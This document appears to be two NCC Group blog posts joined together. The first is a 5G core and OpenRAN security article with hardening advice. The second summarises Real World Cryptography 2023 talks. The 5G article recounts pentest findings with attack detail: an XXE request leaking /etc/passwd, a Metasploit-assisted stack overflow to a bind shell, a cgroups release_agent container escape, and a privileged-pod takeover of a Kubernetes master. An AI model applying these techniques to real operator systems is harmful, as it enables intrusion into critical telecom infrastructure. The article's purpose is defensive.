Any typical 5G network deployment be it a Non Standalone (NSA) or Standalone (SA) core, can have various security threats or risks associated with it. These threats can be exploited by either known (i.e. default credentials) or unknown vulnerabilities (i.e. zero day). Primarily the main focus of any attack is via the existing core management network, be it via a malicious insider or an attacker who has leveraged access to a suitably high level administrator account or utilising default credentials. We have seen this first hand with red teaming attacks against various operators. Secondary attack vectors are via insecure remote sites hosting RAN infrastructure, which in turn allow access to the core network utilising the management network. Various mechanisms (i.e. firewalls, IDS etc) are put in place to manage these risks but vulnerable networks and systems have to be tested thoroughly to limit attacks. Having a good understanding of the 5G network topology and associated risks/threats is key and NCC Group has the necessary experience and knowledge to scope and deliver this testing.

Typical perceived threats and severity if compromised are illustrated below. The high risk vector is via the corporate and vendor estate, medium risk vectors via the external internet and rogue operators and low risk vector via the RAN edge nodes. This factors in ease of access plus the degree of severity should an attacker leverage access. For example, if an attacker was to gain access to the corporate network and suitable credentials to access the cloud network equipment running the 5G network, that would have a high level impact if a DoS attack was conducted. This is opposed to an attacker leveraging access to a RAN edge node to conduct a DoS attack, where the exposed risks would be limited to the cell site in question.

“Attack scenarios against a typical 4G/5G mobile network”

So a bit of background on 5G. A 5G NSA network consists of a 5G OpenRAN deployment or a gNodeB utilising a 4G LTE core. A 5G StandAlone (SA) network consists of a 5G RAN (Radio Access Network) plus a 5G core only. Within an NSA deployment, a secondary 5G carrier is provided in addition to the primary 4G carrier. A 5G NSA user equipment (UE) device connects first to the 4G carrier before also connecting to the secondary 5G carrier. The 4G anchor carrier is used for control plane signalling while the 5G carrier is used for high-speed data plane traffic. This approach has been used for the majority of commercial 5G network deployments to date. It provides improved data rates while leveraging existing 4G infrastructure. The main benefits of 5G NSA are an operator can build out a 5G network on top of their existing 4G infrastructure instead of investing in a new, costly 5G core, the NSA network uses 4G infrastructure which operators are already familiar with and deployment of a 5G network can be quicker by using the existing infrastructure. A 5G SA network helps reduce latency, improves network performance and has centrally controlling network management functions. The 5G SA can deliver new essential 5G services such as network slicing, allowing multiple tenants or networks to exist separate from each other on the same physical infrastructure. While services like smart meters require security, low power and high reliability are more forgiving with respect to latency, others like driver-less cars may need ultra-low latency (URLLC) and high data speeds. Network slicing in 5G supports these diverse services and facilitates the efficient reassignment of resources from one virtual network slice to another. However, the main disadvantage of implementing a 5G SA network is the cost to implement and training of staff to learn and configure correctly all parts of the new 5G SA core infrastructure.

A OpenRAN network allows deployment of a Radio Access Network (RAN) with vendor neutral hardware or software. The interfaces linking components use open interface specifications between the components (eg RU/DU/CU) plus with different architecture options. A Radio Unit (RU) is used to handle the radio link and antenna connectivity, a Distributed unit (DU) is used to handle the baseband protocols and interconnections to the Centralised Unit (CU). The architecture options include RAN with just Radio Units (RU) and Base Band units (BBU), or split between RU,DU,CU. Normally the Radio Unit is a physical amplifier device connected over a fibre or coaxial link to a DU component that is normally virtualised. A CU component is normally located back in a secure datacentre or exchange and provides the eNodeB/gNodeB connectivity into the core. In most engagements we have seen the use of Kubernetes running DU/CU pods as docker containers on primarily Dell hardware, with a software defined network layer linking into the 5G core.

In 5G a user identity (i.e. IMSI) is never sent over the air in the clear. On the RAN/edge datacentre the control and user planes are encrypted over air and on the wire (i.e. IPSEC), with 5G core utilising encrypted and authenticated signalling traffic. The 5G network components have externally and internally exposed HTTP2 Service Based Interface (SBI) APIs and provide access directly to the 5G core components for management, logging and monitoring. Usually the SBI interface is secured using TLS client and server certificates. The network can now support different tenants by implementing network slices, with the Software Defined Networking (SDN) layer isolating network domains for different users.

So what are the main security threats?

Shown below is a high level overview of a 5G network with a summary of threats. A radio unit front end containing the gNodeB (i.e. basestation) handles interconnects to the user equipment (UE). A RU/DU/CU together form the gNodeB. The midhaul (i.e. Distributed Unit) handles the baseband layer to the RU over the fronthaul to the midhaul Centralised Unit (CU). The DU does not have any access to customer communications as it may be deployed in unsupervised sites. The CU and Non-3GPP Inter Working Function (N3IWF), which terminates the Access Stratum (AS) security, will be deployed in sites with more restricted access. The DU and CU components can be collocated or separate, usually running as virtualised components within a cluster on standard servers. To support low latency applications, Multi-Access Edge computing (MEC) servers are now being developed to reduce network congestion and application latency to users by pushing the computing resources, including storage, to the edge of the network collocating them with the front RF equipment. The MEC offers application developers and content providers cloud computing capabilities and an IT service environment at the edge of the external data network to provide processing capacity for high demand streaming applications like virtual reality games as well as low latency processing for driverless cars. All links are connected over Nx links. The main threats against the DU/CU/MEC components are physical attacks against the infrastructure either to cause damage (ie arson) or to compromise the operating system to glean information about users on the RAN signalling plane. In some cases, attacking the core via these components by compromising management platforms is also possible. Targeting the MEC by a poorly configured CI/CD pipeline and the ingest of malicious code could also be a threat.

The N1/N2 link carrying the NAS protocol provides mobility management and session management between the User equipment (UE) and Access and Mobility Management Function (AMF). It is carried over the RRC protocol to/from the UE. A User Plane Function (UPF) is used as a router of user data connections. The Core Network consists of an AMF, a gateway to the core network, which talks to the AUSF/UDM to authenticate the handset with the network, plus the network also authenticates using a public key with the handset. In the core network all components including a lot of legacy 4G components are now virtualised, running as Kubernetes pods, with worker nodes running on either custom cloud environment or an opensource instance like Openstack.  Targeting the 5G NFVI or mobile core cloud via the corporate access is a likely attack vector, either disrupting the service by a DoS attack or acquiring billing data. Similar signalling attacks as in 4G are now prevalent in 5G, due to the same 4G components and associated protocols (ie. SS7, DIAMETER, GTP) being collocated with 5G components, utilising the legacy 4G network to provide service for the 5G network. Within 5G, HTTP/2 SBI interfaces are now in use between the core components (ie AMF/UPF etc), however due to no or poor encryption it is still possible to either view this traffic or query APIs directly. The diagram below illustrates the various threats against a typical 5G deployment. A full more compromise hiearchy of threats are detailed within the Mitre FiGHT attack framework.

“Threats against a typical 5G network”

Reducing the vulnerabilities will decrease the risks and threats an operator will face. However, there is a fine line between testing time and finding vulnerabilities, and we can never guarantee we have found all the issues with a component. When scoping pentesting assessments, we always start with the edge and work our way into the centre of the network, trying to peel away the layers of functionality to expose potential security gaps. The same testing methodology applies to any network, but detailed below are some of the key points that we cover when brought into consult on 5G network builds.

Segment, restrict and deny all

Simple idea – if an attacker cannot see the service or endpoint then they cannot leverage access to it. A segmented network can improve network performance by containing specific traffic only to the parts of the network that need to see it. It can help to reduce attack surface by limiting lateral movement and preventing an attack from spreading. For example, segmentation ensures malware in one section does not affect systems in another. Segmentation reduces the number of in-scope systems, thereby limiting costs associated with regulatory compliance. However, we still see poor segmentation during engagements, where it was possible to directly connect to management components from the corporate operator network. Implementing VLANs to segment a 5G network is down to the security team and network architects. When considering a network architecture, segmenting the management network from signalling and user data traffic is key. Limiting access to the 5G core, NFVI services and exposed management to a small set of IP ranges using robust firewall rules with an implicit “deny all” statement is required. The Operations Support System (OSS) and Business Support Systems (BSS) are instrumental in managing the network but if not properly segmented from the corporate network can allow an unauthenticated attacker to leverage access to the entire 5G core network. Implementing robust role based access controls and multi-factor access controls to these applications is key, with suitably hardened Privileged Access Workstations (PAW) in place, with access closely monitored. Do not implement a secure 5G core but then allow all 3rd party vendors access to the entire network. Limit access using the principle of least privilege – should vendor A have access by default to vendor B’s management system? The answer is a clear no.

Limit access to the underlying network switches and routers – be sure to review the configuration of the devices and review the firmware versions. During recent 5G pentesting we have discovered poor default passwords for privileged accounts still in use, allowing access to network components, plus even end of support switch and router firmware. If an attacker was able to leverage access to the underlying network components any virtualised cloud network could be simply removed from the rest of the enterprise network. Within the new 5G network, software-defined networking (SDN) is used to provide greater network automation and programmability through the use of a centralised controller. However, the SDN controller provides a single point of failure and must have robust security policies in place to protect it. Check the configuration of the SDN controller software. Perhaps it is a java application with known vulnerabilities. Or is there an unauthenticated northbound REST API exposed to everyone in the enterprise network? Has the SDN controller OS not been hardened – perhaps no account lockout policy and default/weak SSH credentials used?

In short follow a zero trust principle when designing 5G network infrastructure.

Secure the exposed management edge

An attacker will likely enable access to the corporate network first before horizontally pivoting into the enterprise network via a jumpbox. So secure any services supplying access to the 5G core either at the NFVI application layer such as hardware running the cloud instance, the exposed OSS/BSS web applications or any interconnects (i.e. N1/N2 NAS) back to the core. Limit access to the exposed web applications with strong Role Based Access Controls (RBAC) and monitor access. Use a centralised access management platform (i.e. CyberARK) to control and police access to the OSS/BSS platforms. If you have to expose the cloud hardware processing layer to users (i.e. Dell iDRAC/HP iLO), don’t use default credentials or limit the recovery of remote password hashes. Exposing these underlying hardware control layers to multiple users due to poor segmentation could lead to an attacker conducting a DoS attack by simply turning off servers within the cluster and locking administrators out of the platforms used to manage services.

The myriad of exposed web APIs used for monitoring or control are also a vector for attack. During a recent engagement we discovered an XML External Entity Injection (XXE) vulnerability within an exposed management API and it was possible for an authenticated low privileged attacker to use a vulnerability in the configuration of the XML processor to read any file on the host system.

It was possible to send crafted payloads to the endpoint OSS application located at https://10.1.2.3/oss/conf/ and trigger this vulnerability, which would allow an attacker to:

  • Read the filesystem (including listing directories), which ended in getting a valid user to log into the server running the API alongside the credentials to successfully log into the SSH service of the mentioned machine.
  • Trigger Server Side Request forgery.

The resulting authenticated XXE request and response is illustrated below:

Request

POST /oss/conf/blah HTTP/1.1
Host: 10.1.2.3:443
Cookie: JSESSIONID=xxxxxx
[…SNIP…]
<!DOCTYPE root []<nc:rpc xmlns:……..
none test;

Response

HTTP/1.1 200
error-message xml:lang=”en”>/edit-someconfig/default: “noneroot:x:0:0:root:/
root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin
user:x:1000:0::/home/user:/bin/bash

Using this XXE vulnerability, it was possible to read a properties file and recover LDAP credential information and then SSH directly into the host running the API server. In this particular case, once on the host running the containerised web application, the user could read all encrypted password hashes that were stored on the host, utilising the same decryption process and poorly stored key values that were used to encrypt the hashes. The same password was used for the root account and allowed for trivial privileged escalation to root. With the root access to the running API server, which in turn was a docker container running as a Kubernetes pod, it was possible to leverage a vulnerability with the Kubernetes configuration to compromise the container and escalate privileges to the underlying cluster worker node host. To prevent this type of escalation a defense in depth approach is paramount on any Linux host plus on any containers. More on this below.

Implement exploit mitigation measures on binaries

If you expose a service externally be sure to check it is compiled with exploit mitigation measures. Exploitation can be significantly simplified due to the manner in which any service/binary has been built. If a binary has an executable stack, and lacks any modern exploit mitigations such as ASLR, NX, stack cookies, hardened C functions, etc, then an attacker can utilise any issues they might find such as a stack buffer overflow, to get remote code execution (RCE) on the host. This was discovered whilst testing a 5G instance and an exposed sensitive encrypted and proprietary service. This service was exposed externally to the enterprise network, and after a brief analysis showed that it was likely a high risk process due to –

• It was exposed on all network interfaces, making it reachable across the network
• It ran as the root user
• It was built with an executable stack, and no exploit mitigations
• It used unsafe functions such as memcpy, strcat, system, popen etc.

The service took a simple encrypted stream of data that was easily decrypt-able into a configuration message. Analysis of the message/data stream showed an issue with how the buffer data was stored and it was possible to trigger a memory corruption via a stack buffer overflow. After decompiling the binary using Ghidra, it was clear one important value was not used as an input to the function processing a certain string of data making up the configuration message – the size of the buffer used to store the parts of the string. Many of the instances where the function was used were safe due to the size and location of the target buffers. However, one of the elements of the message string was split into 12 parts, the first of which was stored in a short buffer (20 bytes in length) that was located at the end of the stack frame. Due to its length it was possible to overwrite data that was adjacent to the buffer, and due to the buffer’s location, this was the saved instruction pointer. When the function completed, the saved instruction pointer was used to determine where to continue execution. As the attacker could control this value they could take control over the process’s execution flow.

Knowing how to crash the stack it was possible using Metasploit to determine the offset of the instruction pointer and to determine how much data could be written to the stack. As the stack was executable it was straightforward to find a ROP gadget that would perform the command ‘JMP ESP’. An initial 100 byte payload was generated using Metasploit (pattern_create.rb). This was used to find the offset to over write the instruction pointer, using the Metasploit pattern_offset.rb script. The shellcode was generated by Metasploit and simply created a remote listener on port 5600. The shellcode was written to the stack after the bytes that control the instruction pointer.

To find and generate suitable exploit code took around 5-10 days work and would require an attacker with good reverse engineering skills. This service was running as root on the 5G virtualised network component, and due to the virtualised component accesses within the 5G network, could have been leveraged by attacker to compromise all other components. During this review the AFL fuzzer was used to determine any other locations within the input stream that could potentially cause a crash. A number of crashes were found revealing multiple issues with the binary.

“Running AFL fuzzer against the target binary”

To illustrate this issue further please read our blog posts Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks. In this particular opensource case, exposing “external” protocols and associated services like the UPF component on a remotely hosted server, not directly within in the 5G core could be leveraged by attacker to compromise a server (ie SMF) within the 5G core. It is important to bear this in mind when deploying equipment out to the end of the network. Physical access to the component, even when within a roadside cabinet or semi-secure location such as an exchange is possible, allowing an attacker to leverage access to the 5G core via a not so closely monitored signalling or data plane service. This is more prevalent now with the deployment of OpenRAN components, where multiple services (RU,DU,CU) are now potentially exposed.

Secure the virtualised cloud layer

All 5G core run on a virtualised cloud system being a custom built environment or from a separate provider such as VMWare. The main question is can an attacker break out of one container or pod to compromise other containers or potentially other clusters? It might even be possible for an attack to exploit the underlying hypervisor infrastructure if suitably positioned. There are multiple capabilities assigned to a running pod/container – privileged containers, hostpid, sysadmin, docker.sock, hostpath, hostnetwork – that could be overly permissive so allowing an attacker to leverage a feature to mount the underlying host cluster file system or to take full control over the Kubernetes host. We have also seen issues with kernel patching with a kernel privileged escalation vulnerability leveraged to breakout of a container.

During recent testing, applying security controls on the deployment of pods in the cluster were not managed by an admission controller. This meant that privileged containers, containers with the node file system mounted, containers running as root users, and containers with host facilities, could be deployed. This would enable any cluster user or principal with pod deployment privileges to compromise the cluster, the workloads, the nodes, and potentially gain access to the wider 5G environment.

The risk to an operator is that any developer with deployment privileges, even to a single namespace, can compromise the underlying node and then access all containers running on that node – which may be from other namespaces they do not have direct privileges for, breaking the separation of role model in use.

Leveraging a vulnerability such as the previous XXE issue or brute forcing SSH login credentials to a Docker container running with overly permissive capabilities has been leveraged on various engagements and is illustrated below.

“Container breakout via initial XXE vulnerability”

As mentioned it was possible to recover ssh credentials with a XXE vulnerability. Utilising the SSH access an escalating to root permissions on the container, it was possible to abuse a known issue with cgroups to perform privilege escalation and compromise the nodes and cluster from an unprivileged container. The Linux kernel does not check that the process setting the cgroups release_agent file has correct administrative privileges – the CAP_SYS_ADMIN capability in the root namespace , and so an unprivileged container that can create a new namespace with a fake CAP_SYS_ADMIN capability through unshare, could force the kernel to execute arbitrary commands when a process completed.


It was possible to enter a namespace with CAP_SYS_ADMIN privileges, and use the notify_on_release feature of cgroups, that did not differentiate between root namespace CAP_SYS_ADMIN and user namespace CAP_SYS_ADMIN, to execute a shell script with root privileges on the underlying host. A syscall breakout was used to execute a reverse shell payload with cluster admin privileges on the underlying cluster host. This is shown below:

“Container breakout utilising cgroups”

Once a shell was created on the underlying kubernetes cluster host, it was then possible to SSH directly to the RAN cluster due to credentials seen in backup files and exploit any basestation equipment. It was also possible to leverage weak security controls on the deployment of pods in the cluster since there was no admission controller. As this exploited cluster user had pod deployment privileges, it was possible to deploy a manifest specifying a master node for the pod to be deployed to, the access gained was root privileges on a master node. This highly privileged access enabled compromise of the whole cluster through gaining cluster administer privileges from a kubeconfig file located on the node filesystem.

As a proof of concept attack, the following deployment specification can be used to target the master node by chroot’ing to the underlying host :

“Deploying a bad pod to gain access to master node”

With the kubeconfig file from the master node it is then possible to read all namespaces on the cluster. It would also be possible from the master node to access the underlying hypervisor or virtualisation platform. We have also had in some cases due to discovered credentials, the ability to log directly into the VSphere client and disable hosts.

Strict enforcement of privilege limitations is essential to ensuring that users, containers, and services cannot bridge the containerisation layers of container, namespace, cluster, node, and hosting service. It should be noted that if only a small number of principals have access to a cluster, and they all require cluster administration privileges then, a cluster admin could likely modify any admission controller policies. However, best practice is to implement business policies and enforce the blocking of containers with weak security controls. Equally, if more roles are included with the administration model at a later date, then the likelihood of value in implementing admission controllers increases. In short the main recommendation is to ensure appropriate privilege security controls are enforced to prevent deployments having access or the ability to compromise other layers of the orchestration model. Consider implementing limitations to which worker nodes containers can deploy, and insecure manifest configurations can be deployed.

Scan, verify, monitor and patch all images regularly

It is important when deploying virtualised container images to check regularly for any changes to the underlying OS, audit any events such as login events plus patch all critical vulnerabilities as soon as possible. Basic vulnerability management is key – identifying and prevent risks to all the hosts, images and functions. Scanning images before they are deployed should be done by default on a regular interval.

For instance, if a Kubernetes cluster is utilising a Harbor registry, simply enabling vulnerability scanning “Automatically scan images on push” with a suitable tool such as Trivy with a regularly updated set of vulnerabilities will suffice. Even preventing vulnerable images from running is possible for images with a certain severity. Implement signed images or content trust also gives you the ability to verify both the integrity and the publisher of all the data received from a registry over any channel.

“Setting harbor to automatically scan images”

Enforce with tighter contracts with vendors the need to supply patches to images quicker and verify as much as possible all patches have had no change to the underlying functionality. Enforcing the use of harden Linux OS images is best practice, utilising CIS benchmarks scans to verify OS images have been hardened. This is also important on the underlying cluster hosts. Our recommendation is to move security back to the developer or vendor with a secure Continuous Integration and Continuous Development (CI/CD) pipeline with Open Policy Agent integrations to secure workloads across the Software Development Life Cycle (SDLC). NCC Group conducts regular reviews of CI/CD pipelines and can help you understand the issues. Please check out 10 real world stories of how we’ve compromised ci/cd pipelines for further details.

If possible get a software build of materials (SBOM) from vendors. SBOM is an industry best practice part of secure software development that enhances the understanding of the upstream software supply chain, so that vulnerability notifications and updates can be properly and safely handled across the installed customer base. The SBOM documents proprietary and third-party software, including commercial and free and open source software (FOSS), used in software products. The SBOM should be maintained and used by the software supplier and stored and viewed by the network operator. Operators should be periodically checking against known vulnerability databases to identify potential risk. However, the level of risk for a vulnerability should be determined by the software vendor and operator with consideration of the software product, use case, and network environment.

Once an image is running, verifying the running services is key with some kind of runtime defences. This will entail implementing strong auditing utilising auditd and syslog to monitor kernel, process and access logs. We have seen no use of this service plus no use of any antivirus. Securing containers with Seccomp and either AppArmor or SELinux would be enough to prevent container escape. Taking all the logging data into a suitable active defence engine could allow for more predictive and threat-based active protection for running containers. Predictive protection could include capabilities like determining when a container runs a process not included in the origin image or creates an unexpected network socket. Threat-based protection includes capabilities like detecting when malware is added to a container or when a container connects to a botnet. Utilising a machine learning model to create a model for each running container in the cluster is highly recommended. Applied intelligence used for monitoring log data is key for any threat prevention, aiding in the SOC identifying quickly key 5G attack vectors.

Implement 5G security functions

Previous generations of cellular networks failed on providing confidentiality/integrity protection on some pre-authentication signalling messages, allowing attackers to exploit multiple vulnerabilities such as IMSI sniffing or downgrade attacks to 5G. The 5G standard facilitates a base level of security with various security features. However, we have seen during engagements these are not enabled.

The 5G network uses data encryption and integrity protection mechanisms to safeguard data transmitted by the enterprise, prevent information leakage and enhance data security for the enterprise. Not implementing these will compromise the confidentiality, integrity and availability (CIA).

5G introduces novel protection mechanisms specifically designed for signalling and user data. 5G security controls outlined in 3GPP Release 15 include:

• Subscriber permanent identifier (SUPI) – a unique identifier for the subscriber
• Dual authentication and key agreement (AKA)
• Anchor key is used to identify and authenticate UE. The key is used to create secure access throughout the 5G infrastructure
• X509 certificates and PKI are used to protect various non-UE devices
• Encryption keys are used to demonstrate the integrity of signalling data
• Authentication when moving from 3GPP to non-3GPP networks
• Security anchor function (SEAF) allows reauthentication of the UE when it moves between different network access points
• The home network carries out the original authentication based on the home profile (home control)
• Encryption keys will be based on IP network protocols and IPSec
• Security edge protection proxy (SEPP) protects the home network edge
• 5G separates control and data plane traffic

Besides increasing the length of the key algorithms (to 256-bit expected for future 3GPP releases), 5G forces mandatory integrity support of the user plane, and extends confidentiality and integrity protection to the initial NAS messages. The table below summarises in various columns the standard requirements in terms of confidentiality and integrity protection as defined in the 3GPP specs. 5G also secures the UE network capabilities, a field within the initial NAS message, which is used to allow UEs to report to the AMF about the supported integrity and encryption algorithms in the initial NAS message.

In general there has been an increase in the number of security features in 5G to address issues found with the legacy 2G, 3G and 4G network deployments and various published exploits. These have been included within the different 3GPP specifications and adopted by the various vendors. It should be noted that a lot of the security features are optional and the implementation of these is down to the operator rather than the vendor.

The only security features that are defined as mandatory within the 5G standards are integrity checking of the RRC/NAS signalling plane and on the IPX interface the mandatory use of a Security Edge Protection Proxy (SEPP). The SUPI encryption is optional but in the UK this is required due to GDPR.

“Table illustrating various 4G / 5G security functions”

As shown, the user plane integrity protection is still optional so still in theory vulnerable to attack such as malicious redirect of traffic using a DNS response. Some providers now by default turn on the new integrity protection feature for the user plane and prevent an attacker forcing the network to use a less secure algorithm. In 4G, a series of GRX firewalls are in place to limit attacks via the IPX network but due to the use of HTTPS in 5G control messages a new SEPP device is mandated to allow matching of control and user plane sessions.

By collecting 5G signalling traffic it is possible to check implementations and analyse the vulnerabilities. NCC Group conducts these assessments and advises clients on implementing various optional security features either related to 5G or with other legacy systems such as enabling A5/4 algorithm on GSM networks. This issue is illustrated clearly within the paper European 5G Security in the Wild: Reality versus Expectations. This paper highlights the issues with no concealment of permanent identifiers and the fact it was possible to capture the permanent IMSI and IMEI values, which are sent without protection within the NAS Identity Response message. Issues with the temporary identifier and GUTI refresh have also been observed. After receiving the NAS Attach Accept and RRC Connection Request messages, the freshness of m-TMSI value was not changed, only changing during a Registration procedure. This would allow TMSI tracking and possible geolocation of 5G user handsets.

As 5G networks become more mature and deployments progress to full 5G SA deployments, it is likely issues affecting the network will be addressed. However, it is important to implement and test these new security features as soon as possible to prevent a compromise.

Summary

The 5G network is a complex environment, requiring methodical comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their network. Fundamentally, a 5G network must be configured properly, robustly tested and security features enabled.

As seen from above, most compromises have the following root causes or can be traced back to:

• Lack of segmentation and segregation
• Default configurations
• Over permissive permissions and roles
• Poor patching
• Lack of security controls

Real World Cryptography Conference 2023 – Part II

After a brief interlude, filled with several articles from the Cryptography Services team, we’re back with our final thoughts from this year’s Real World Cryptography Conference. In case you missed it, check out Part I for more insights.

  1. Interoperability in E2EE Messaging
  2. Threshold ECDSA Towards Deployment
  3. The Path to Real World FHE: Navigating the Ciphertext Space
  4. High-Assurance Go Cryptography in Practice

Interoperability in E2EE Messaging

A specter is haunting Europe – the specter of platform interoperability. The EU signed the Digital Market Acts (DMA) into law in September of last year, mandating chat platforms provide support for interoperable communications. This requirement will be in effect by March of 2024, an aggressive timeline requiring fast action from cryptographic (and regular) engineers. There are advantages to interoperability. It allows users to communicate with their friends and family across platforms, and it allows developers to build applications that work across platforms. There is the potential for this to partially mitigate the network effects associated with platform lock-in, which could lead to more competition and greater freedom of choice for end users. However, interoperability requires shared standards, and standards tend to imply compromise. This is a particularly severe challenge with secure chat apps which aim to provide their users with high levels of security. Introducing hastily designed, legislatively mandated components into these systems is a high-risk change which, in the worst case, could introduce weaknesses which, if introduced, would be difficult to fix (due to the effects of lock-in and the corresponding level of coordination and engineering effort required). This is further complicated by the heterogeneity of the field in regard to end-to-end encrypted chat: E2EE protocols vary by ciphersuite, level and form of authentication, personal identifier (email, phone number, username/password, etc.), and more. Any standardized design for interoperability would need to be able to manage all this complexity. This presentation on work by Ghosh, Grubbs, Len, and Rösler discussed one effort at introducing such a standard for interoperability between E2EE chat apps, focused on extending existing components of widely used E2EE apps. This is appropriate as these apps are most likely to be identified as “gatekeeper” apps to which the upcoming regulations apply in force. The proposed solution uses server-to-server interoperability, in which each end user is only required to directly communicate with their own messaging provider. Three main components of messaging affected by the DMA are identified: identity systems, E2EE protocols, and abuse prevention.

  • For the first of these items, a system for running encrypted queries to remote providers’ identity systems is proposed; this allows user identities to be associated with keys in such a way that the actual identity data is abstracted and thus could be an email, a phone number, or an arbitrary string.
  • For the second issue, E2EE encryption, a number of simple solutions are considered and rejected; the final proposal has several parts. Sender-anonymous wrappers are proposed, using a variant of the Secure Sender protocol from Signal, to hide sender metadata; for encryption in transit, non-gatekeeper apps can use an encapsulated implementation of a gatekeeper app’s E2EE through a client bridge. This provides both confidentiality and authenticity, while minimizing metadata leakage.
  • For the third issue, abuse prevention, a number of options (including “doing nothing” are again considered and rejected). The final design is somewhat nonobvious, and consists of server-side spam filtering, user reporting (via asymmetric message franking, one of the more cryptographically fresh and interesting parts of the system), and blocklisting (which requires a small data leakage, in that the initiator would need to share the blocked party’s user ID with their own server).

Several open problems were also identified (these points are quoted directly from the slides):

  • How do we improve the privacy of interoperable E2EE by reducing metadata leakage?
  • How do we extend other protocols used in E2EE messaging, like key transparency, into the interoperability setting?
  • How do we extend our framework and analyses to group chats and encrypted calls?

This is important and timely work on a topic which has the potential to result in big wins for user privacy and user experience; however, this best-case scenario will only play out if players in industry and academia can keep pace with the timeline set by the DMA. This requires quick work to design, implement, and review these protocols, and we look forward to seeing how these systems take shape in the months to come.

Eli Sohl

Threshold ECDSA Towards Deployment

A Threshold Signature Scheme (TSS) allows any sufficiently large subset of signers to cryptographically sign a message. There has been a flurry of research in this area in the last 10 years, driven partly by financial institutions’ needs to secure crypto wallets and partly by academic interest in the area from the Multiparty Computation (MPC) perspective. Some signature schemes are more amenable to “thresholding” than others. For example, due to linearity features of “classical” Schnorr signatures, Schnorr is more amenable to “thresholding” than ECDSA (see the FROST protocol in this context). As for thresholding ECDSA, there are tradeoffs as well; if one allows using cryptosystems such as Pallier’s, the overall protocol complexity drops, but speed and extraneous security model assumptions appear to suffer. The DKLS papers, listed below, aim for competitive speeds and minimizing necessary security assumptions:

  • DKLS18: “Secure Two-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
  • DKLS19: “Secure Multi-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat

The first paper proposes a 2-out-of-n ECDSA scheme, whereas the second paper extends it to the t-out-of-n case. The DKLS 2-party multiplication algorithm is based on Oblivious Transfer (OT) together with a number of optimization techniques. The OT is batched, then further sped up by an OT Extension (a way to reduce a large number of OTs to a smaller number of OTs using symmetric key cryptography) and finally used to multiply in a threshold manner. An optimized variant of this multiplication algorithm is used in DKLS19 as well. The talk aimed to share the challenges that occur in practical development and deployments of the DKLS19 scheme, including:

  • The final protocol essentially requires three messages, however, the authors found they could pipeline the messages when signing multiple messages.
  • Key refreshing can be done efficiently, where refreshing means replacing the shares and leaving the actual key unchanged.
  • Round complexity was reduced to a 5-round protocol, reducing the time cost especially over WAN.
  • One bug identified by Roy in OT extensions did not turn out to apply for the DKLS implementations, however, the authors are still taking precautions and moving to SoftSpoken OT.
  • An error handling mistake was found in the implementation by Riva where an OT failure error was not propagated to the top.
  • A number of bug bounties around the improper use of the Fiat-Shamir transform were seen recently. If the protocol needs a programmable Random Oracle, every (sub) protocol instance needs a different Random Oracle, which can be done using unique hash prefixes.

The talk also discussed other gaps between theory and practice: establishing sessions, e.g., whether O(n2) QR code scans required to set up the participant set.

Aleksandar Kircanski

The Path to Real World FHE: Navigating the Ciphertext Space

Shruthi Gorantala from Google presented The Path to Real World FHE: Navigating the Ciphertext Space. There was also an FHE workshop prior to RWC where a number of advances in the field were presented. Fully Homomorphic Encryption (FHE) allows functions to be executed directly on ciphertext that ends up with the same encrypted results if the functions were run on plaintext. This would result in a major shift in the relationship between data privacy and data processing as previously an application would need to decrypt the data first. Therefore, FHE removes the need for the decryption and re-encryption steps. This would help preserve end-to-end privacy and allow users to have additional guarantees such as cloud providers not having access to user’s data. However, performance is a major concern as performing computations on encrypted data using FHE still remains significantly slower than performing computations on the plaintext. Key challenges for FHE include:

  • Data size expansion,
  • Speed, and
  • Usability.

The focus of the presentation was on presenting a model of FHE hierarchy of needs that included both deficiency and growth needs. FHE deficiency needs are the following:

  • FHE Instruction Set which focuses on data manipulation and ciphertext maintenance.
  • FHE Compilers and Transpilers which focuses on parameter selection, optimizers and schedulers.
  • FHE Application Development which focuses on development speed, debugging and interoperability.

The next phase would be FHE growth needs:

  • FHE Systems Integration and Privacy Engineering which includes threat modeling.
  • FHE used a critical component of privacy enhancing technologies (PETs).
  • A key current goal for FHE is reduce the computational overhead for an entire application to demonstrate FHE’s usefulness in practical real-world settings.

Javed Samuel

High-Assurance Go Cryptography in Practice

Filippo Valsorda, the maintainer of the cryptographic code in the Go language since 2018, presented the principles at work behind that maintenance effort. The title above is from the RWC program, but the first presentation slide contained an updated title which might be clearer: “Go cryptography without bugs”. Indeed, the core principle of it is that Filippo has a well-defined notion of what he is trying to achieve, that he expressed in slightly more words as follows: “secure, safe, practical, modern, in this order”. This talk was all about very boring cryptography, with no complex mathematics; at most, some signatures or key exchanges, like we already did in the 1990s. But such operations are what actually gets used by applications most of the time, and it is of a great practical importance that these primitives operate correctly, and that common applications do not misuse them through a difficult API. The talk went over these principles in a bit more details, specifically about:

  • Memory safety: use of a programming language that at least ensures that buffer overflows and use-after-free conditions cannot happen (e.g., Go itself, or Rust).
  • Tests: many test vectors, to try to exercise edge cases and other tricky conditions. In particular, negative test vectors are important, i.e., verifying that invalid data is properly detected and rejected (many test vector frameworks are only functional and check that the implementation runs correctly under normal conditions, but this is cryptography and in cryptography there is an attacker who is intent on making the conditions very abnormal).
  • Fuzzing: more tests designed by the computer trying to find unforeseen edge cases. Fuzzing helps because handcrafted negative test vectors can only check for edge conditions that the developer thought about; the really dangerous ones are the cases that the developer did not think about, and fuzzing can find some of them.
  • Safe APIs: APIs should be hard to misuse and should hide all details that are not needed. For instance, when dealing with elliptic curves, points and scalars and signatures should be just arrays of bytes; it is not useful for applications to see modular integers and finite field elements and point coordinates. Sometimes it is, when building new primitives with more complex properties; but for 95% of applications (at least), using a low-level mathematics-heavy API is just more ways to get things wrongs.
  • Code generation: for some tasks, the computer is better at writing code than the human. Main example here is implementation of finite fields, in particular integers modulo a big prime; much sorrow has ensued from ill-controlled propagation of carries. The fiat-crypto project automatically generates proven correct (and efficient) code for that and Go uses said code.
  • Low complexity: things should be simple. The more functions an API offers, the higher the probability that an application calls the wrong one. Old APIs and primitives, that should normally no longer be used in practice, are deprecated; not fully removed, because backward compatibility with existing source code is an important feature, but still duly marked as improper to use unless a very good reason to do so is offered. Who needs to use plain DSA signatures or the XTEA block cipher nowadays? Some people do! But most are better off not trying.
